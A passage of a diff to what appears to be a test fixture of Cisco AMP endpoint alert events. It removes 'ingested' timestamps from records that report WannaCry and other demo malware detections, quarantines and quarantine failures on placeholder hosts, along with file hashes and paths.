Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "severity": 3 @@ -2143,7 +2117,6 @@ ], "code": "2164260880", "id": "6419179222052372000", - "ingested": "2022-02-02T05:53:29.530526989Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2217,7 +2190,6 @@ ], "code": "1090519054", "id": "6419179222052372000", - "ingested": "2022-02-02T05:53:29.530528009Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2305,7 +2277,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530529128Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2381,7 +2352,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530530116Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2457,7 +2427,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530531112Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2531,7 +2500,6 @@ ], "code": "1090519054", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530532099Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2615,7 +2583,6 @@ ], "code": "553648143", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530533094Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2687,7 +2654,6 @@ ], "code": "553648143", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530534083Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2761,7 +2727,6 @@ ], "code": "1090519054", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530535245Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2847,7 +2812,6 @@ ], "code": "1090519054", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530536262Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -2935,7 +2899,6 @@ ], "code": "553648143", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530537260Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3009,7 +2972,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530538371Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -3099,7 +3061,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530539352Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -3189,7 +3150,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530540347Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -3283,7 +3243,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530541330Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 @@ -3386,7 +3345,6 @@ ], "code": "1090519105", "id": "6583840597369422000", - "ingested": "2022-02-02T05:53:29.530542321Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", "severity": 2 @@ -3486,7 +3444,6 @@ ], "code": "1107296274", "id": "6701398782847286000", - "ingested": "2022-02-02T05:53:29.530543344Z", "kind": "alert", "original": 